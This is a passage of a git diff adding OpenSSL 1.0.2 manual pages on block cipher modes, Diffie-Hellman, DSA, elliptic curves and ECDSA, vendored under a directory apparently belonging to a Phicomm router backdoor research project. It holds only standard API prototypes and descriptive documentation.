+The strength of the CFB mode depends on the size of k (maximal if
+j == k).  In my implementation this is always the case.
+
+=item *
+
+Selection of a small value for j will require more cycles through
+the encipherment algorithm per unit of plaintext and thus cause
+greater processing overheads.
+
+=item *
+
+Only multiples of j bits can be enciphered.
+
+=item *
+
+An error will affect the current and the following ciphertext variables.
+
+=back
+
+=head2 Output Feedback Mode (OFB)
+
+Normally, this is found as the function I<algorithm>_ofb_encrypt().
+
+=over 2
+
+
+=item *
+
+a number of bits (j) <= 64 are enciphered at a time.
+
+=item *
+
+The OFB mode produces the same ciphertext whenever the same
+plaintext enciphered using the same key and starting variable.  More
+over, in the OFB mode the same key stream is produced when the same
+key and start variable are used.  Consequently, for security reasons
+a specific start variable should be used only once for a given key.
+
+=item *
+
+The absence of chaining makes the OFB more vulnerable to specific attacks.
+
+=item *
+
+The use of different start variables values prevents the same
+plaintext enciphering to the same ciphertext, by producing different
+key streams.
+
+=item *
+
+Selection of a small value for j will require more cycles through
+the encipherment algorithm per unit of plaintext and thus cause
+greater processing overheads.
+
+=item *
+
+Only multiples of j bits can be enciphered.
+
+=item *
+
+OFB mode of operation does not extend ciphertext errors in the
+resultant plaintext output.  Every bit error in the ciphertext causes
+only one bit to be in error in the deciphered plaintext.
+
+=item *
+
+OFB mode is not self-synchronizing.  If the two operation of
+encipherment and decipherment get out of synchronism, the system needs
+to be re-initialized.
+
+=item *
+
+Each re-initialization should use a value of the start variable
+different from the start variable values used before with the same
+key.  The reason for this is that an identical bit stream would be
+produced each time from the same parameters.  This would be
+susceptible to a 'known plaintext' attack.
+
+=back
+
+=head2 Triple ECB Mode
+
+Normally, this is found as the function I<algorithm>_ecb3_encrypt().
+
+=over 2
+
+=item *
+
+Encrypt with key1, decrypt with key2 and encrypt with key3 again.
+
+=item *
+
+As for ECB encryption but increases the key length to 168 bits.
+There are theoretic attacks that can be used that make the effective
+key length 112 bits, but this attack also requires 2^56 blocks of
+memory, not very likely, even for the NSA.
+
+=item *
+
+If both keys are the same it is equivalent to encrypting once with
+just one key.
+
+=item *
+
+If the first and last key are the same, the key length is 112 bits.
+There are attacks that could reduce the effective key strength
+to only slightly more than 56 bits, but these require a lot of memory.
+
+=item *
+
+If all 3 keys are the same, this is effectively the same as normal
+ecb mode.
+
+=back
+
+=head2 Triple CBC Mode
+
+Normally, this is found as the function I<algorithm>_ede3_cbc_encrypt().
+
+=over 2
+
+
+=item *
+
+Encrypt with key1, decrypt with key2 and then encrypt with key3.
+
+=item *
+
+As for CBC encryption but increases the key length to 168 bits with
+the same restrictions as for triple ecb mode.
+
+=back
+
+=head1 NOTES
+
+This text was been written in large parts by Eric Young in his original
+documentation for SSLeay, the predecessor of OpenSSL.  In turn, he attributed
+it to:
+
+	AS 2805.5.2
+	Australian Standard
+	Electronic funds transfer - Requirements for interfaces,
+	Part 5.2: Modes of operation for an n-bit block cipher algorithm
+	Appendix A
+
+=head1 SEE ALSO
+
+L<blowfish(3)|blowfish(3)>, L<des(3)|des(3)>, L<idea(3)|idea(3)>,
+L<rc2(3)|rc2(3)>
+
+=cut
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/dh.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/dh.pod
new file mode 100644
index 0000000..c3ccd06
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/dh.pod
@@ -0,0 +1,78 @@
+=pod
+
+=head1 NAME
+
+dh - Diffie-Hellman key agreement
+
+=head1 SYNOPSIS
+
+ #include <openssl/dh.h>
+ #include <openssl/engine.h>
+
+ DH *	DH_new(void);
+ void	DH_free(DH *dh);
+
+ int	DH_size(const DH *dh);
+
+ DH *	DH_generate_parameters(int prime_len, int generator,
+		void (*callback)(int, int, void *), void *cb_arg);
+ int	DH_check(const DH *dh, int *codes);
+
+ int	DH_generate_key(DH *dh);
+ int	DH_compute_key(unsigned char *key, BIGNUM *pub_key, DH *dh);
+
+ void DH_set_default_method(const DH_METHOD *meth);
+ const DH_METHOD *DH_get_default_method(void);
+ int DH_set_method(DH *dh, const DH_METHOD *meth);
+ DH *DH_new_method(ENGINE *engine);
+ const DH_METHOD *DH_OpenSSL(void);
+
+ int DH_get_ex_new_index(long argl, char *argp, int (*new_func)(),
+	     int (*dup_func)(), void (*free_func)());
+ int DH_set_ex_data(DH *d, int idx, char *arg);
+ char *DH_get_ex_data(DH *d, int idx);
+
+ DH *	d2i_DHparams(DH **a, unsigned char **pp, long length);
+ int	i2d_DHparams(const DH *a, unsigned char **pp);
+
+ int	DHparams_print_fp(FILE *fp, const DH *x);
+ int	DHparams_print(BIO *bp, const DH *x);
+
+=head1 DESCRIPTION
+
+These functions implement the Diffie-Hellman key agreement protocol.
+The generation of shared DH parameters is described in
+L<DH_generate_parameters(3)|DH_generate_parameters(3)>; L<DH_generate_key(3)|DH_generate_key(3)> describes how
+to perform a key agreement.
+
+The B<DH> structure consists of several BIGNUM components.
+
+ struct
+        {
+        BIGNUM *p;		// prime number (shared)
+        BIGNUM *g;		// generator of Z_p (shared)
+        BIGNUM *priv_key;	// private DH value x
+        BIGNUM *pub_key;	// public DH value g^x
+        // ...
+        };
+ DH
+
+Note that DH keys may use non-standard B<DH_METHOD> implementations,
+either directly or by the use of B<ENGINE> modules. In some cases (eg. an
+ENGINE providing support for hardware-embedded keys), these BIGNUM values
+will not be used by the implementation or may be used for alternative data
+storage. For this reason, applications should generally avoid using DH
+structure elements directly and instead use API functions to query or
+modify keys.
+
+=head1 SEE ALSO
+
+L<dhparam(1)|dhparam(1)>, L<bn(3)|bn(3)>, L<dsa(3)|dsa(3)>, L<err(3)|err(3)>,
+L<rand(3)|rand(3)>, L<rsa(3)|rsa(3)>, L<engine(3)|engine(3)>,
+L<DH_set_method(3)|DH_set_method(3)>, L<DH_new(3)|DH_new(3)>,
+L<DH_get_ex_new_index(3)|DH_get_ex_new_index(3)>,
+L<DH_generate_parameters(3)|DH_generate_parameters(3)>,
+L<DH_compute_key(3)|DH_compute_key(3)>, L<d2i_DHparams(3)|d2i_DHparams(3)>,
+L<RSA_print(3)|RSA_print(3)> 
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/dsa.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/dsa.pod
new file mode 100644
index 0000000..da07d2b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/dsa.pod
@@ -0,0 +1,114 @@
+=pod
+
+=head1 NAME
+
+dsa - Digital Signature Algorithm
+
+=head1 SYNOPSIS
+
+ #include <openssl/dsa.h>
+ #include <openssl/engine.h>
+
+ DSA *	DSA_new(void);
+ void	DSA_free(DSA *dsa);
+
+ int	DSA_size(const DSA *dsa);
+
+ DSA *	DSA_generate_parameters(int bits, unsigned char *seed,
+                int seed_len, int *counter_ret, unsigned long *h_ret,
+		void (*callback)(int, int, void *), void *cb_arg);
+
+ DH *	DSA_dup_DH(const DSA *r);
+
+ int	DSA_generate_key(DSA *dsa);
+
+ int	DSA_sign(int dummy, const unsigned char *dgst, int len,
+		unsigned char *sigret, unsigned int *siglen, DSA *dsa);
+ int	DSA_sign_setup(DSA *dsa, BN_CTX *ctx, BIGNUM **kinvp,
+                BIGNUM **rp);
+ int	DSA_verify(int dummy, const unsigned char *dgst, int len,
+		const unsigned char *sigbuf, int siglen, DSA *dsa);
+
+ void DSA_set_default_method(const DSA_METHOD *meth);
+ const DSA_METHOD *DSA_get_default_method(void);
+ int DSA_set_method(DSA *dsa, const DSA_METHOD *meth);
+ DSA *DSA_new_method(ENGINE *engine);
+ const DSA_METHOD *DSA_OpenSSL(void);
+
+ int DSA_get_ex_new_index(long argl, char *argp, int (*new_func)(),
+	     int (*dup_func)(), void (*free_func)());
+ int DSA_set_ex_data(DSA *d, int idx, char *arg);
+ char *DSA_get_ex_data(DSA *d, int idx);
+
+ DSA_SIG *DSA_SIG_new(void);
+ void	DSA_SIG_free(DSA_SIG *a);
+ int	i2d_DSA_SIG(const DSA_SIG *a, unsigned char **pp);
+ DSA_SIG *d2i_DSA_SIG(DSA_SIG **v, unsigned char **pp, long length);
+
+ DSA_SIG *DSA_do_sign(const unsigned char *dgst, int dlen, DSA *dsa);
+ int	DSA_do_verify(const unsigned char *dgst, int dgst_len,
+	     DSA_SIG *sig, DSA *dsa);
+
+ DSA *	d2i_DSAPublicKey(DSA **a, unsigned char **pp, long length);
+ DSA *	d2i_DSAPrivateKey(DSA **a, unsigned char **pp, long length);
+ DSA * 	d2i_DSAparams(DSA **a, unsigned char **pp, long length);
+ int	i2d_DSAPublicKey(const DSA *a, unsigned char **pp);
+ int 	i2d_DSAPrivateKey(const DSA *a, unsigned char **pp);
+ int	i2d_DSAparams(const DSA *a,unsigned char **pp);
+
+ int	DSAparams_print(BIO *bp, const DSA *x);
+ int	DSAparams_print_fp(FILE *fp, const DSA *x);
+ int	DSA_print(BIO *bp, const DSA *x, int off);
+ int	DSA_print_fp(FILE *bp, const DSA *x, int off);
+
+=head1 DESCRIPTION
+
+These functions implement the Digital Signature Algorithm (DSA).  The
+generation of shared DSA parameters is described in
+L<DSA_generate_parameters(3)|DSA_generate_parameters(3)>;
+L<DSA_generate_key(3)|DSA_generate_key(3)> describes how to
+generate a signature key. Signature generation and verification are
+described in L<DSA_sign(3)|DSA_sign(3)>.
+
+The B<DSA> structure consists of several BIGNUM components.
+
+ struct
+        {
+        BIGNUM *p;		// prime number (public)
+        BIGNUM *q;		// 160-bit subprime, q | p-1 (public)
+        BIGNUM *g;		// generator of subgroup (public)
+        BIGNUM *priv_key;	// private key x
+        BIGNUM *pub_key;	// public key y = g^x
+        // ...
+        }
+ DSA;
+
+In public keys, B<priv_key> is NULL.
+
+Note that DSA keys may use non-standard B<DSA_METHOD> implementations,
+either directly or by the use of B<ENGINE> modules. In some cases (eg. an
+ENGINE providing support for hardware-embedded keys), these BIGNUM values
+will not be used by the implementation or may be used for alternative data
+storage. For this reason, applications should generally avoid using DSA
+structure elements directly and instead use API functions to query or
+modify keys.
+
+=head1 CONFORMING TO
+
+US Federal Information Processing Standard FIPS 186 (Digital Signature
+Standard, DSS), ANSI X9.30
+
+=head1 SEE ALSO
+
+L<bn(3)|bn(3)>, L<dh(3)|dh(3)>, L<err(3)|err(3)>, L<rand(3)|rand(3)>,
+L<rsa(3)|rsa(3)>, L<sha(3)|sha(3)>, L<engine(3)|engine(3)>,
+L<DSA_new(3)|DSA_new(3)>,
+L<DSA_size(3)|DSA_size(3)>,
+L<DSA_generate_parameters(3)|DSA_generate_parameters(3)>,
+L<DSA_dup_DH(3)|DSA_dup_DH(3)>,
+L<DSA_generate_key(3)|DSA_generate_key(3)>,
+L<DSA_sign(3)|DSA_sign(3)>, L<DSA_set_method(3)|DSA_set_method(3)>,
+L<DSA_get_ex_new_index(3)|DSA_get_ex_new_index(3)>,
+L<RSA_print(3)|RSA_print(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ec.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ec.pod
new file mode 100644
index 0000000..7d57ba8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ec.pod
@@ -0,0 +1,201 @@
+=pod
+
+=head1 NAME
+
+ec - Elliptic Curve functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/ec.h>
+ #include <openssl/bn.h>
+
+ const EC_METHOD *EC_GFp_simple_method(void);
+ const EC_METHOD *EC_GFp_mont_method(void);
+ const EC_METHOD *EC_GFp_nist_method(void);
+ const EC_METHOD *EC_GFp_nistp224_method(void);
+ const EC_METHOD *EC_GFp_nistp256_method(void);
+ const EC_METHOD *EC_GFp_nistp521_method(void);
+
+ const EC_METHOD *EC_GF2m_simple_method(void);
+
+ EC_GROUP *EC_GROUP_new(const EC_METHOD *meth);
+ void EC_GROUP_free(EC_GROUP *group);
+ void EC_GROUP_clear_free(EC_GROUP *group);
+ int EC_GROUP_copy(EC_GROUP *dst, const EC_GROUP *src);
+ EC_GROUP *EC_GROUP_dup(const EC_GROUP *src);
+ const EC_METHOD *EC_GROUP_method_of(const EC_GROUP *group);
+ int EC_METHOD_get_field_type(const EC_METHOD *meth);
+ int EC_GROUP_set_generator(EC_GROUP *group, const EC_POINT *generator, const BIGNUM *order, const BIGNUM *cofactor);
+ const EC_POINT *EC_GROUP_get0_generator(const EC_GROUP *group);
+ int EC_GROUP_get_order(const EC_GROUP *group, BIGNUM *order, BN_CTX *ctx);
+ int EC_GROUP_get_cofactor(const EC_GROUP *group, BIGNUM *cofactor, BN_CTX *ctx);
+ void EC_GROUP_set_curve_name(EC_GROUP *group, int nid);
+ int EC_GROUP_get_curve_name(const EC_GROUP *group);
+ void EC_GROUP_set_asn1_flag(EC_GROUP *group, int flag);
+ int EC_GROUP_get_asn1_flag(const EC_GROUP *group);
+ void EC_GROUP_set_point_conversion_form(EC_GROUP *group, point_conversion_form_t form);
+ point_conversion_form_t EC_GROUP_get_point_conversion_form(const EC_GROUP *);
+ unsigned char *EC_GROUP_get0_seed(const EC_GROUP *x);
+ size_t EC_GROUP_get_seed_len(const EC_GROUP *);
+ size_t EC_GROUP_set_seed(EC_GROUP *, const unsigned char *, size_t len);
+ int EC_GROUP_set_curve_GFp(EC_GROUP *group, const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
+ int EC_GROUP_get_curve_GFp(const EC_GROUP *group, BIGNUM *p, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
+ int EC_GROUP_set_curve_GF2m(EC_GROUP *group, const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
+ int EC_GROUP_get_curve_GF2m(const EC_GROUP *group, BIGNUM *p, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
+ int EC_GROUP_get_degree(const EC_GROUP *group);
+ int EC_GROUP_check(const EC_GROUP *group, BN_CTX *ctx);
+ int EC_GROUP_check_discriminant(const EC_GROUP *group, BN_CTX *ctx);
+ int EC_GROUP_cmp(const EC_GROUP *a, const EC_GROUP *b, BN_CTX *ctx);
+ EC_GROUP *EC_GROUP_new_curve_GFp(const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
+ EC_GROUP *EC_GROUP_new_curve_GF2m(const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
+ EC_GROUP *EC_GROUP_new_by_curve_name(int nid);
+
+ size_t EC_get_builtin_curves(EC_builtin_curve *r, size_t nitems);
+
+ EC_POINT *EC_POINT_new(const EC_GROUP *group);
+ void EC_POINT_free(EC_POINT *point);
+ void EC_POINT_clear_free(EC_POINT *point);
+ int EC_POINT_copy(EC_POINT *dst, const EC_POINT *src);
+ EC_POINT *EC_POINT_dup(const EC_POINT *src, const EC_GROUP *group);
+ const EC_METHOD *EC_POINT_method_of(const EC_POINT *point);
+ int EC_POINT_set_to_infinity(const EC_GROUP *group, EC_POINT *point);
+ int EC_POINT_set_Jprojective_coordinates_GFp(const EC_GROUP *group, EC_POINT *p,
+	const BIGNUM *x, const BIGNUM *y, const BIGNUM *z, BN_CTX *ctx);
+ int EC_POINT_get_Jprojective_coordinates_GFp(const EC_GROUP *group,
+	const EC_POINT *p, BIGNUM *x, BIGNUM *y, BIGNUM *z, BN_CTX *ctx);
+ int EC_POINT_set_affine_coordinates_GFp(const EC_GROUP *group, EC_POINT *p,
+	const BIGNUM *x, const BIGNUM *y, BN_CTX *ctx);
+ int EC_POINT_get_affine_coordinates_GFp(const EC_GROUP *group,
+	const EC_POINT *p, BIGNUM *x, BIGNUM *y, BN_CTX *ctx);
+ int EC_POINT_set_compressed_coordinates_GFp(const EC_GROUP *group, EC_POINT *p,
+	const BIGNUM *x, int y_bit, BN_CTX *ctx);
+ int EC_POINT_set_affine_coordinates_GF2m(const EC_GROUP *group, EC_POINT *p,
+	const BIGNUM *x, const BIGNUM *y, BN_CTX *ctx);
+ int EC_POINT_get_affine_coordinates_GF2m(const EC_GROUP *group,
+	const EC_POINT *p, BIGNUM *x, BIGNUM *y, BN_CTX *ctx);
+ int EC_POINT_set_compressed_coordinates_GF2m(const EC_GROUP *group, EC_POINT *p,
+	const BIGNUM *x, int y_bit, BN_CTX *ctx);
+ size_t EC_POINT_point2oct(const EC_GROUP *group, const EC_POINT *p,
+	point_conversion_form_t form,
+        unsigned char *buf, size_t len, BN_CTX *ctx);
+ int EC_POINT_oct2point(const EC_GROUP *group, EC_POINT *p,
+        const unsigned char *buf, size_t len, BN_CTX *ctx);
+ BIGNUM *EC_POINT_point2bn(const EC_GROUP *, const EC_POINT *,
+	point_conversion_form_t form, BIGNUM *, BN_CTX *);
+ EC_POINT *EC_POINT_bn2point(const EC_GROUP *, const BIGNUM *,
+	EC_POINT *, BN_CTX *);
+ char *EC_POINT_point2hex(const EC_GROUP *, const EC_POINT *,
+	point_conversion_form_t form, BN_CTX *);
+ EC_POINT *EC_POINT_hex2point(const EC_GROUP *, const char *,
+	EC_POINT *, BN_CTX *);
+
+ int EC_POINT_add(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a, const EC_POINT *b, BN_CTX *ctx);
+ int EC_POINT_dbl(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a, BN_CTX *ctx);
+ int EC_POINT_invert(const EC_GROUP *group, EC_POINT *a, BN_CTX *ctx);
+ int EC_POINT_is_at_infinity(const EC_GROUP *group, const EC_POINT *p);
+ int EC_POINT_is_on_curve(const EC_GROUP *group, const EC_POINT *point, BN_CTX *ctx);
+ int EC_POINT_cmp(const EC_GROUP *group, const EC_POINT *a, const EC_POINT *b, BN_CTX *ctx);
+ int EC_POINT_make_affine(const EC_GROUP *group, EC_POINT *point, BN_CTX *ctx);
+ int EC_POINTs_make_affine(const EC_GROUP *group, size_t num, EC_POINT *points[], BN_CTX *ctx);
+ int EC_POINTs_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *n, size_t num, const EC_POINT *p[], const BIGNUM *m[], BN_CTX *ctx);
+ int EC_POINT_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *n, const EC_POINT *q, const BIGNUM *m, BN_CTX *ctx);
+ int EC_GROUP_precompute_mult(EC_GROUP *group, BN_CTX *ctx);
+ int EC_GROUP_have_precompute_mult(const EC_GROUP *group);
+
+ int EC_GROUP_get_basis_type(const EC_GROUP *);
+ int EC_GROUP_get_trinomial_basis(const EC_GROUP *, unsigned int *k);
+ int EC_GROUP_get_pentanomial_basis(const EC_GROUP *, unsigned int *k1, 
+	unsigned int *k2, unsigned int *k3);
+ EC_GROUP *d2i_ECPKParameters(EC_GROUP **, const unsigned char **in, long len);
+ int i2d_ECPKParameters(const EC_GROUP *, unsigned char **out);
+ #define d2i_ECPKParameters_bio(bp,x) ASN1_d2i_bio_of(EC_GROUP,NULL,d2i_ECPKParameters,bp,x)
+ #define i2d_ECPKParameters_bio(bp,x) ASN1_i2d_bio_of_const(EC_GROUP,i2d_ECPKParameters,bp,x)
+ #define d2i_ECPKParameters_fp(fp,x) (EC_GROUP *)ASN1_d2i_fp(NULL, \
+                (char *(*)())d2i_ECPKParameters,(fp),(unsigned char **)(x))
+ #define i2d_ECPKParameters_fp(fp,x) ASN1_i2d_fp(i2d_ECPKParameters,(fp), \
+		(unsigned char *)(x))
+ int     ECPKParameters_print(BIO *bp, const EC_GROUP *x, int off);
+ int     ECPKParameters_print_fp(FILE *fp, const EC_GROUP *x, int off);
+
+ EC_KEY *EC_KEY_new(void);
+ int EC_KEY_get_flags(const EC_KEY *key);
+ void EC_KEY_set_flags(EC_KEY *key, int flags);
+ void EC_KEY_clear_flags(EC_KEY *key, int flags);
+ EC_KEY *EC_KEY_new_by_curve_name(int nid);
+ void EC_KEY_free(EC_KEY *key);
+ EC_KEY *EC_KEY_copy(EC_KEY *dst, const EC_KEY *src);
+ EC_KEY *EC_KEY_dup(const EC_KEY *src);
+ int EC_KEY_up_ref(EC_KEY *key);
+ const EC_GROUP *EC_KEY_get0_group(const EC_KEY *key);
+ int EC_KEY_set_group(EC_KEY *key, const EC_GROUP *group);
+ const BIGNUM *EC_KEY_get0_private_key(const EC_KEY *key);
+ int EC_KEY_set_private_key(EC_KEY *key, const BIGNUM *prv);
+ const EC_POINT *EC_KEY_get0_public_key(const EC_KEY *key);
+ int EC_KEY_set_public_key(EC_KEY *key, const EC_POINT *pub);
+ unsigned EC_KEY_get_enc_flags(const EC_KEY *key);
+ void EC_KEY_set_enc_flags(EC_KEY *eckey, unsigned int flags);
+ point_conversion_form_t EC_KEY_get_conv_form(const EC_KEY *key);
+ void EC_KEY_set_conv_form(EC_KEY *eckey, point_conversion_form_t cform);
+ void *EC_KEY_get_key_method_data(EC_KEY *key, 
+	void *(*dup_func)(void *), void (*free_func)(void *), void (*clear_free_func)(void *));
+ void EC_KEY_insert_key_method_data(EC_KEY *key, void *data,
+	void *(*dup_func)(void *), void (*free_func)(void *), void (*clear_free_func)(void *));
+ void EC_KEY_set_asn1_flag(EC_KEY *eckey, int asn1_flag);
+ int EC_KEY_precompute_mult(EC_KEY *key, BN_CTX *ctx);
+ int EC_KEY_generate_key(EC_KEY *key);
+ int EC_KEY_check_key(const EC_KEY *key);
+ int EC_KEY_set_public_key_affine_coordinates(EC_KEY *key, BIGNUM *x, BIGNUM *y);
+
+ EC_KEY *d2i_ECPrivateKey(EC_KEY **key, const unsigned char **in, long len);
+ int i2d_ECPrivateKey(EC_KEY *key, unsigned char **out);
+
+ EC_KEY *d2i_ECParameters(EC_KEY **key, const unsigned char **in, long len);
+ int i2d_ECParameters(EC_KEY *key, unsigned char **out);
+
+ EC_KEY *o2i_ECPublicKey(EC_KEY **key, const unsigned char **in, long len);
+ int i2o_ECPublicKey(EC_KEY *key, unsigned char **out);
+ int	ECParameters_print(BIO *bp, const EC_KEY *key);
+ int	EC_KEY_print(BIO *bp, const EC_KEY *key, int off);
+ int	ECParameters_print_fp(FILE *fp, const EC_KEY *key);
+ int	EC_KEY_print_fp(FILE *fp, const EC_KEY *key, int off);
+ #define ECParameters_dup(x) ASN1_dup_of(EC_KEY,i2d_ECParameters,d2i_ECParameters,x)
+ #define EVP_PKEY_CTX_set_ec_paramgen_curve_nid(ctx, nid) \
+	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, EVP_PKEY_OP_PARAMGEN, \
+				EVP_PKEY_CTRL_EC_PARAMGEN_CURVE_NID, nid, NULL)
+
+
+=head1 DESCRIPTION
+
+This library provides an extensive set of functions for performing operations on elliptic curves over finite fields.
+In general an elliptic curve is one with an equation of the form:
+
+y^2 = x^3 + ax + b
+
+An B<EC_GROUP> structure is used to represent the definition of an elliptic curve. Points on a curve are stored using an
+B<EC_POINT> structure. An B<EC_KEY> is used to hold a private/public key pair, where a private key is simply a BIGNUM and a
+public key is a point on a curve (represented by an B<EC_POINT>).
+
+The library contains a number of alternative implementations of the different functions. Each implementation is optimised
+for different scenarios. No matter which implementation is being used, the interface remains the same. The library
+handles calling the correct implementation when an interface function is invoked. An implementation is represented by
+an B<EC_METHOD> structure.
+
+The creation and destruction of B<EC_GROUP> objects is described in L<EC_GROUP_new(3)|EC_GROUP_new(3)>. Functions for
+manipulating B<EC_GROUP> objects are described in L<EC_GROUP_copy(3)|EC_GROUP_copy(3)>.
+
+Functions for creating, destroying and manipulating B<EC_POINT> objects are explained in L<EC_POINT_new(3)|EC_POINT_new(3)>,
+whilst functions for performing mathematical operations and tests on B<EC_POINTs> are coverd in L<EC_POINT_add(3)|EC_POINT_add(3)>.
+
+For working with private and public keys refer to L<EC_KEY_new(3)|EC_KEY_new(3)>. Implementations are covered in
+L<EC_GFp_simple_method(3)|EC_GFp_simple_method(3)>.
+
+For information on encoding and decoding curve parameters to and from ASN1 see L<d2i_ECPKParameters(3)|d2i_ECPKParameters(3)>.
+
+=head1 SEE ALSO
+
+L<crypto(3)|crypto(3)>, L<EC_GROUP_new(3)|EC_GROUP_new(3)>, L<EC_GROUP_copy(3)|EC_GROUP_copy(3)>,
+L<EC_POINT_new(3)|EC_POINT_new(3)>, L<EC_POINT_add(3)|EC_POINT_add(3)>, L<EC_KEY_new(3)|EC_KEY_new(3)>,
+L<EC_GFp_simple_method(3)|EC_GFp_simple_method(3)>, L<d2i_ECPKParameters(3)|d2i_ECPKParameters(3)>
+
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ecdsa.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ecdsa.pod
new file mode 100644
index 0000000..46c071b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ecdsa.pod
@@ -0,0 +1,206 @@
+=pod
+
+=head1 NAME
+
+ECDSA_SIG_new, ECDSA_SIG_free, i2d_ECDSA_SIG, d2i_ECDSA_SIG, ECDSA_size, ECDSA_sign_setup, ECDSA_sign, ECDSA_sign_ex, ECDSA_verify, ECDSA_do_sign, ECDSA_do_sign_ex, ECDSA_do_verify - Elliptic Curve Digital Signature Algorithm
+
+=head1 SYNOPSIS
+
+ #include <openssl/ecdsa.h>
+
+ ECDSA_SIG*	ECDSA_SIG_new(void);
+ void		ECDSA_SIG_free(ECDSA_SIG *sig);
+ int		i2d_ECDSA_SIG(const ECDSA_SIG *sig, unsigned char **pp);
+ ECDSA_SIG*	d2i_ECDSA_SIG(ECDSA_SIG **sig, const unsigned char **pp, 
+		long len);
+
+ ECDSA_SIG*	ECDSA_do_sign(const unsigned char *dgst, int dgst_len,
+			EC_KEY *eckey);
+ ECDSA_SIG*	ECDSA_do_sign_ex(const unsigned char *dgst, int dgstlen, 
+			const BIGNUM *kinv, const BIGNUM *rp,
+			EC_KEY *eckey);
+ int		ECDSA_do_verify(const unsigned char *dgst, int dgst_len,
+			const ECDSA_SIG *sig, EC_KEY* eckey);
+ int		ECDSA_sign_setup(EC_KEY *eckey, BN_CTX *ctx,
+			BIGNUM **kinv, BIGNUM **rp);
+ int		ECDSA_sign(int type, const unsigned char *dgst,
+			int dgstlen, unsigned char *sig,
+			unsigned int *siglen, EC_KEY *eckey);
+ int		ECDSA_sign_ex(int type, const unsigned char *dgst,
+			int dgstlen, unsigned char *sig,
+			unsigned int *siglen, const BIGNUM *kinv, 
+			const BIGNUM *rp, EC_KEY *eckey);
+ int		ECDSA_verify(int type, const unsigned char *dgst,
+			int dgstlen, const unsigned char *sig,
+			int siglen, EC_KEY *eckey);
+ int		ECDSA_size(const EC_KEY *eckey);
+
+ const ECDSA_METHOD*	ECDSA_OpenSSL(void);
+ void		ECDSA_set_default_method(const ECDSA_METHOD *meth);
+ const ECDSA_METHOD*	ECDSA_get_default_method(void);
+ int		ECDSA_set_method(EC_KEY *eckey,const ECDSA_METHOD *meth);
+
+ int		ECDSA_get_ex_new_index(long argl, void *argp,
+			CRYPTO_EX_new *new_func,
+			CRYPTO_EX_dup *dup_func,
+			CRYPTO_EX_free *free_func);
+ int		ECDSA_set_ex_data(EC_KEY *d, int idx, void *arg);
+ void*		ECDSA_get_ex_data(EC_KEY *d, int idx);
+
+=head1 DESCRIPTION
+
+The B<ECDSA_SIG> structure consists of two BIGNUMs for the
+r and s value of a ECDSA signature (see X9.62 or FIPS 186-2).
+
+ struct
+	{
+	BIGNUM *r;
+	BIGNUM *s;
+ } ECDSA_SIG;
+
+ECDSA_SIG_new() allocates a new B<ECDSA_SIG> structure (note: this
+function also allocates the BIGNUMs) and initialize it.
+
+ECDSA_SIG_free() frees the B<ECDSA_SIG> structure B<sig>.
+
+i2d_ECDSA_SIG() creates the DER encoding of the ECDSA signature
+B<sig> and writes the encoded signature to B<*pp> (note: if B<pp>
+is NULL B<i2d_ECDSA_SIG> returns the expected length in bytes of 
+the DER encoded signature). B<i2d_ECDSA_SIG> returns the length
+of the DER encoded signature (or 0 on error).
+
+d2i_ECDSA_SIG() decodes a DER encoded ECDSA signature and returns
+the decoded signature in a newly allocated B<ECDSA_SIG> structure.
+B<*sig> points to the buffer containing the DER encoded signature
+of size B<len>.
+
+ECDSA_size() returns the maximum length of a DER encoded
+ECDSA signature created with the private EC key B<eckey>.
+
+ECDSA_sign_setup() may be used to precompute parts of the
+signing operation. B<eckey> is the private EC key and B<ctx>
+is a pointer to B<BN_CTX> structure (or NULL). The precomputed
+values or returned in B<kinv> and B<rp> and can be used in a
+later call to B<ECDSA_sign_ex> or B<ECDSA_do_sign_ex>.
+
+ECDSA_sign() is wrapper function for ECDSA_sign_ex with B<kinv>
+and B<rp> set to NULL.
+
+ECDSA_sign_ex() computes a digital signature of the B<dgstlen> bytes
+hash value B<dgst> using the private EC key B<eckey> and the optional
+pre-computed values B<kinv> and B<rp>. The DER encoded signatures is
+stored in B<sig> and it's length is returned in B<sig_len>. Note: B<sig>
+must point to B<ECDSA_size> bytes of memory. The parameter B<type>
+is ignored.
+
+ECDSA_verify() verifies that the signature in B<sig> of size
+B<siglen> is a valid ECDSA signature of the hash value
+B<dgst> of size B<dgstlen> using the public key B<eckey>.
+The parameter B<type> is ignored.
+
+ECDSA_do_sign() is wrapper function for ECDSA_do_sign_ex with B<kinv>
+and B<rp> set to NULL.
+
+ECDSA_do_sign_ex() computes a digital signature of the B<dgst_len>
+bytes hash value B<dgst> using the private key B<eckey> and the
+optional pre-computed values B<kinv> and B<rp>. The signature is
+returned in a newly allocated B<ECDSA_SIG> structure (or NULL on error).
+
+ECDSA_do_verify() verifies that the signature B<sig> is a valid
